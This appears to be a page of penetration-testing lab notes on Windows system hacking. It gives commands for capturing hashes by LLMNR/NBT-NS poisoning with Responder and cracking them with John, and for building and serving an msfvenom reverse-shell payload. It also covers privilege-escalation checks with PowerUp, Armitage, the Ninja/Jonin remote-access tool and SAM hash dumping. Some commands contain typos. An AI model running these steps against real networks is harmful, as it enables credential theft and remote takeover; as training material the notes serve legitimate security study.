1. Gain access to the system
1. Perform Active Online Attack to Crack the System’s Password using Responder

LLMNR (link local multicast name resolution) and NBT-NS (netbios namer service) are used to performe name resolution on the local link.
Responder is LLMNR, NBT-NS, MDNS poisoner. By default the tool only responds to SMB.
check the interfaces
ifconfig
Now run responder on the interface.
sudo responder -I ens33
Now when a user on the LAN try to access the unavailable share, responder will capture the hash.


logs are stored in /usr/share/responder folder. We will have a hash. Now crack it with John.
on ubuntu you can install john as
sudo snap install john-the-ripper
sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
2. Audit system passwords using Lophtcrack
windows tool. Can crack other password on remote machine if you know a single account utilizing SMB. Use password auditing. use password auditing wizard.
3. Find Vulnerabilities on exploit sites
4. Gain Access to a Remote System using Reverse Shell Generator
create msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x64 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.ex
using apache to transfer the file
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chmod -R www-data:www-data /var/www/html/share
service apche2 start
Now run msfconsole
msfconsole
use exploit/multi/handler
set the payload type, port and IP and visit the IP to download the executable. Run it you will get the shell
You can run the following commands in meterpreter.
sysinfo //get system information
upload file through meterpreter
the powersploit priv escaltion script./usr/share/windows-resources/powersploit
upload PowerUp.ps1 powerup.ps1
Now get shell
shell
Now execute the script
powershell -ExecutionPolicy bypass -command ". .\powerup.ps1;invoke-All-Checks"
Now exit it and to get a VNC from meterpreter use the following command.
run vnc
5. Gain access to a system using armitage
GUI based msf
service postgresql start
Now run armitage from Applications menu. Run intense scan. and then we can create a payload according to our target.

Once the victim opens the payload, we get the session.
6. Gain access to system using Ninja Jonin
Ninja is installed on target and Jonin on attacker machine.
We need to edit its config file to change the ip and port.

Open the Jonin listenere. it will catch the sessions.
list //to list all sessions
connect 1 //to connect to session
//to get to cmd
change
cmd
help //displays help
7. Buffer Overflow
Tools required

8. System Password hacking
# To Dump Windows SAM file hashes
pwDump7.exe> hashes.txt
Last updated
Was this helpful?